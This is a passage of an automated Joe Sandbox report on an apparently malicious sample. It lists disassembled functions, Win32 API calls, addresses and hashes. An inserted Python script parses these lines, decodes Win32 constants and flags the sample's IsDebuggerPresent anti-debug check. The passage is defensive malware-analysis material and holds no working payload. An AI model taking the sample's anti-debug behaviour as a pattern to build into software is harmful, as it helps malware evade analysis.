                                                                                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3500052701-0
                                                                                                                                                      • Opcode ID: 56e05a8ad111728ec5af64a06a1504a81ea89c499980419779c4ca64404e90dc
                                                                                                                                                      • Instruction ID: 284cce7d51930d5a623d12ca9f92bba294342bd9a83357da3b5c86b719a355f7
                                                                                                                                                      • Opcode Fuzzy Hash: 56e05a8ad111728ec5af64a06a1504a81ea89c499980419779c4ca64404e90dc
                                                                                                                                                      • Instruction Fuzzy Hash: EC31C871905744AFEB22DF248899BD6BFECBF16308F0004AEDADDA7241C7745A84CB51
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,0056895C,?,005F9CE8,0000000C), ref: 00568A94
                                                                                                                                                      • GetLastError.KERNEL32(?,0056895C,?,005F9CE8,0000000C), ref: 00568A9E
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00568AC9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2583163307-0
                                                                                                                                                      • Opcode ID: ec4e7584c1cacaec92441a6b26fd37f04bc51a94304ac5eedb96c3ab0e81cd9e
                                                                                                                                                      • Instruction ID: 675aaac6b39746d18595c1e82b57c62e90baa601b4534b742b347d913311b1db
                                                                                                                                                      • Opcode Fuzzy Hash: ec4e7584c1cacaec92441a6b26fd37f04bc51a94304ac5eedb96c3ab0e81cd9e
                                                                                                                                                      • Instruction Fuzzy Hash: B9016B326455504AD32423B4D889B7E2F8ABBC2774F29071BFD08CB1D2EE208CC99391
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,005697CA,FF8BC369,00000000,00000002,00000000), ref: 00569754
                                                                                                                                                      • GetLastError.KERNEL32(?,005697CA,FF8BC369,00000000,00000002,00000000,?,00565EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00556F61), ref: 0056975E
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00569765
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2336955059-0
                                                                                                                                                      • Opcode ID: e40dcc376e8c50fef794322a9bcc89b87ca5f62ea347b53703265a1042450b29
                                                                                                                                                      • Instruction ID: 33f8a2ac6dcc32f4adc5e5943288551f54510d829d0fe3e8560775b9e79b7021
                                                                                                                                                      • Opcode Fuzzy Hash: e40dcc376e8c50fef794322a9bcc89b87ca5f62ea347b53703265a1042450b29
                                                                                                                                                      • Instruction Fuzzy Hash: E2012432620515AFCB059FA9DC05CAE7F2EFB86720B240319FC148B190EA309D419BA0
                                                                                                                                                      APIs
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00542FB6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                      • String ID: CALL
                                                                                                                                                      • API String ID: 1385522511-4196123274
                                                                                                                                                      • Opcode ID: 8b4d7170622bd37e1b366f9f11d86ed3712ecd91e4a99694a0ee87f3266bc310
                                                                                                                                                      • Instruction ID: e3e4c48dbc57a36ed4d2fc02285b8f396f4aaf3b2bf513670db8131ae26ed124
                                                                                                                                                      • Opcode Fuzzy Hash: 8b4d7170622bd37e1b366f9f11d86ed3712ecd91e4a99694a0ee87f3266bc310
                                                                                                                                                      • Instruction Fuzzy Hash: FD229A706082029FC714DF14C885B6ABFF5BF88318F64895DF8969B3A2D731E945CB82
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6ae254268db8501d5d4c2007c61ab105dd10e8e0d939f2feb79c6bf0ec902fc4
                                                                                                                                                      • Instruction ID: b98e3fac5125c53710a87e2ab1ba855d8e3a1a9317890896d0b322ab5b756c7a
                                                                                                                                                      • Opcode Fuzzy Hash: 6ae254268db8501d5d4c2007c61ab105dd10e8e0d939f2feb79c6bf0ec902fc4
                                                                                                                                                      • Instruction Fuzzy Hash: 8132DE30A00A069FDB20EF54D899BAEBFB5FF41318F144919EC55AB2A1D731AD84CB81
                                                                                                                                                      APIs
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005333E9,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00534227
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FullNamePath_wcslen
                                                                                                                                                      • String ID: $`
                                                                                                                                                      • API String ID: 4019309064-1483412578
                                                                                                                                                      • Opcode ID: c8e5e73422db03f3b5a8e6c031517b55d91c83596e123da5555a5f76a4675201
                                                                                                                                                      • Instruction ID: 6be8cadbfb2394bacf48cd158655b42811977653545f7cca1f06f3be9696baab
                                                                                                                                                      • Opcode Fuzzy Hash: c8e5e73422db03f3b5a8e6c031517b55d91c83596e123da5555a5f76a4675201
                                                                                                                                                      • Instruction Fuzzy Hash: F711A53550020A9BCF05EBA4D909EDE7FF9BF48344F004465B985E3281EE74E7849F21
                                                                                                                                                      APIs
                                                                                                                                                      • GetComputerNameW.KERNEL32(?,?), ref: 0058E6F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                      • String ID: X64
                                                                                                                                                      • API String ID: 3545744682-893830106
                                                                                                                                                      • Opcode ID: e68627ae599343ee031f8914cbb3ae0c66fd5a845ec7762daa9190996f4714fd
                                                                                                                                                      • Instruction ID: d4f4a512502670205abe8523aa5146798af68dd036eb0813fdcbec844bc6e7a6
                                                                                                                                                      • Opcode Fuzzy Hash: e68627ae599343ee031f8914cbb3ae0c66fd5a845ec7762daa9190996f4714fd
                                                                                                                                                      • Instruction Fuzzy Hash: 26D0C9B4805218EACF90EF80EC89DDDBB7CBB14304F100C65F902F2000EB7465489B20
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 005A9665
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 005A9673
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileStringWrite$FullNamePath
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3876400906-0
                                                                                                                                                      • Opcode ID: 8ee645d14444b10c1fac9cfe636d1655c6620740035a84864ff1aeb3f3d82897
                                                                                                                                                      • Instruction ID: f849437003c9e7df9de36c114f6f56208b9f7bf6d0c9036c027190a2512922d0
                                                                                                                                                      • Opcode Fuzzy Hash: 8ee645d14444b10c1fac9cfe636d1655c6620740035a84864ff1aeb3f3d82897
                                                                                                                                                      • Instruction Fuzzy Hash: 17111C79600A269FDB04EB64C845D6EBBF9FF88360B058854F856AB361CB30FD01DB90
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00533B33,?,00008000), ref: 00536E80
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00533B33,?,00008000), ref: 005759A2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: 9756236c84e79b52544a25e79e7d29aa369761b73437e77547cd505ae44fbd5c
                                                                                                                                                      • Instruction ID: d69423a0ddd6e7e0031df0c1ffc9f4fe6dee15050ce434c432d687fce130edd2
                                                                                                                                                      • Opcode Fuzzy Hash: 9756236c84e79b52544a25e79e7d29aa369761b73437e77547cd505ae44fbd5c
                                                                                                                                                      • Instruction Fuzzy Hash: 1E015231145625BAE3310A26CC0EF977F98FF06B74F14C314BE99AA1E0C7B45859DB90
                                                                                                                                                      APIs
                                                                                                                                                      • IsThemeActive.UXTHEME ref: 005332C4
                                                                                                                                                        • Part of subcall function 0053326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00533282
                                                                                                                                                        • Part of subcall function 0053326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00533299
                                                                                                                                                        • Part of subcall function 00533312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,005332EF,?), ref: 00533342
                                                                                                                                                        • Part of subcall function 00533312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,005332EF,?), ref: 00533355
                                                                                                                                                        • Part of subcall function 00533312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00602418,00602400,?,?,?,?,?,?,005332EF,?), ref: 005333C1
                                                                                                                                                        • Part of subcall function 00533312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00533442
                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 005332FE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1550534281-0
                                                                                                                                                      • Opcode ID: eeac945e468a41f3980664579054747dbfdb13e21e340429359d0521d07b88f7
                                                                                                                                                      • Instruction ID: f71b78f472f34588b0d059c841312d4d1706639db1379fa57de78022b4eefcdf
                                                                                                                                                      • Opcode Fuzzy Hash: eeac945e468a41f3980664579054747dbfdb13e21e340429359d0521d07b88f7
                                                                                                                                                      • Instruction Fuzzy Hash: 04F0E271584B569FE709AF60EC2EB263FA1FB00306F009C16F509850F2DFB98455DB00
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SleepTimetime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 346578373-0
                                                                                                                                                      • Opcode ID: 93c971176ee66afafd405f6bd66361c837a08087bf9948300711e66a674f4738
                                                                                                                                                      • Instruction ID: fa3770b924ffb0c812f6c647cc3d9a6fc7a6bacf193d24f308fbb60001e68e88
                                                                                                                                                      • Opcode Fuzzy Hash: 93c971176ee66afafd405f6bd66361c837a08087bf9948300711e66a674f4738
                                                                                                                                                      • Instruction Fuzzy Hash: FEF082712406069FC314EB69D449F56BFF9FF98361F004429E85AD7250DB70B800CBA1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0056506A: DeleteCriticalSection.KERNEL32(?,?,?,?,?,005F9C08,00000010,005594DE), ref: 005650CC
                                                                                                                                                        • Part of subcall function 0056506A: _free.LIBCMT ref: 005650DA
                                                                                                                                                        • Part of subcall function 0056510A: _free.LIBCMT ref: 0056512C
                                                                                                                                                      • DeleteCriticalSection.KERNEL32(-00000020), ref: 005594FA
                                                                                                                                                      • _free.LIBCMT ref: 0055950E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$CriticalDeleteSection
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1906768660-0
                                                                                                                                                      • Opcode ID: c3437cfb64801d535ef897d18f3528c84c64a6bdf563d3172782915677f2bd48
                                                                                                                                                      • Instruction ID: 9f5f235327b65466ef71b9193e4cbc5cbd915e612db7263df1863590fc39e623
                                                                                                                                                      • Opcode Fuzzy Hash: c3437cfb64801d535ef897d18f3528c84c64a6bdf563d3172782915677f2bd48
                                                                                                                                                      • Instruction Fuzzy Hash: B1E0DF328508108BC7217768FC1AA1A3BA5FB8B360F05041BF80097020DF25AC468645
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0053AE65,?,?,?), ref: 00538793
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0053AE65,?,?,?), ref: 005387C9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                      • Opcode ID: 7de6efe2ec007a4af10520e3acf6816baa1cc5a9c30b6c8b9bddcd5b1096082b
                                                                                                                                                      • Instruction ID: fec2604edaa03ab8736f5477fe41df7dd6fec3518e147d49a08e9b2fce940c05
                                                                                                                                                      • Opcode Fuzzy Hash: 7de6efe2ec007a4af10520e3acf6816baa1cc5a9c30b6c8b9bddcd5b1096082b
                                                                                                                                                      • Instruction Fuzzy Hash: 5001BC713012057FEB1CAB6A9D4AF7F7FAAEBC4340F14003EB502DA1D0EEA1AC009224
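The API lines in the CreateFileW, IsThemeActive and MultiByteToWideChar entries above carry their Win32 arguments as raw hex (the access mask 80000000 / C0000000, the share mode 00000007, the creation disposition 00000003 / 00000004, the code page 0000FDE9, the SystemParametersInfoW action 00002000 / 00002001). The following is an added example, not part of the Joe Sandbox report or of the analysed sample, that parses lines in this report format, including the "Part of subcall function" nesting, and decodes those constants by name. The constant values come from the Windows SDK headers; the embedded sample lines are copied from the three entries named above, and the anti-analysis API list and all function names are this example's own.

```python
"""Decode Joe Sandbox-style API lines into named Win32 constants (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Win32 constants from the Windows SDK headers (winnt.h / fileapi.h / winuser.h / winnls.h).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL"}
CODEPAGES = {0: "CP_ACP", 1: "CP_OEMCP", 65001: "CP_UTF8"}          # 0xFDE9 == 65001
SPI = {0x2000: "SPI_GETFOREGROUNDLOCKTIMEOUT", 0x2001: "SPI_SETFOREGROUNDLOCKTIMEOUT"}
# Assumption of this example: which APIs to flag as anti-analysis checks.
ANTI_ANALYSIS = {"IsDebuggerPresent": "anti-debug check"}

# One report line: optional "Part of subcall function XXXXXXXX:", then Api.Module(args), ref: addr
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")

# Sample lines copied from the report entries above (constructed input for this example).
SAMPLE = """\
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00533B33,?,00008000), ref: 00536E80
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00533B33,?,00008000), ref: 005759A2
• IsThemeActive.UXTHEME ref: 005332C4
  • Part of subcall function 0053326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00533282
  • Part of subcall function 00533312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,005332EF,?), ref: 00533355
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0053AE65,?,?,?), ref: 00538793
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # int for hex values, None for "?", str for literals such as CMDLINE
    ref: int                        # call-site address
    caller: Optional[int] = None    # set for "Part of subcall function" lines


def parse_arg(tok: str):
    """'?' is an unresolved argument; otherwise hex (possibly signed), else a literal string."""
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        caller = int(m["caller"], 16) if m["caller"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), caller))
    return calls


def decode_flags(value, table) -> List[str]:
    """Expand a bitmask into names from table; bits the table does not cover are kept as hex."""
    if not isinstance(value, int):
        return ["?"]
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def describe(call: ApiCall) -> dict:
    """Name the arguments that matter for triage; empty dict when nothing is decoded."""
    a = call.args
    if call.api == "CreateFileW" and len(a) >= 6:
        disp = DISPOSITION.get(a[4], f"0x{a[4]:X}" if isinstance(a[4], int) else "?")
        return {"access": decode_flags(a[1], GENERIC_ACCESS), "share": decode_flags(a[2], SHARE_MODE),
                "disposition": disp, "attrs": decode_flags(a[5], FILE_ATTRS)}
    if call.api == "MultiByteToWideChar" and a:
        return {"codepage": CODEPAGES.get(a[0], str(a[0]))}
    if call.api == "SystemParametersInfoW" and a:
        return {"action": SPI.get(a[0], str(a[0]))}
    if call.api in ANTI_ANALYSIS:
        return {"note": ANTI_ANALYSIS[call.api]}
    return {}


def triage(text: str) -> List[str]:
    """One human-readable line per API call, with decoded arguments appended."""
    out = []
    for c in parse_api_lines(text):
        extra = ", ".join(f"{k}={v}" for k, v in describe(c).items())
        prefix = f"[sub {c.caller:08X}] " if c.caller is not None else ""
        out.append(f"{prefix}{c.api}.{c.module} @ {c.ref:08X}" + (f" ({extra})" if extra else ""))
    return out


if __name__ == "__main__":
    for line in triage(SAMPLE):
        print(line)
```

Reading the decoded output against the report: the first CreateFileW opens an existing file for read only, while the second uses GENERIC_READ|GENERIC_WRITE with OPEN_ALWAYS, which creates the file if it is missing; both share modes are FILE_SHARE_READ|WRITE|DELETE. The 0xFDE9 code page is CP_UTF8, and the IsDebuggerPresent subcall under the IsThemeActive entry is the check worth correlating with the anti-VM signatures at the top of the report.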
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
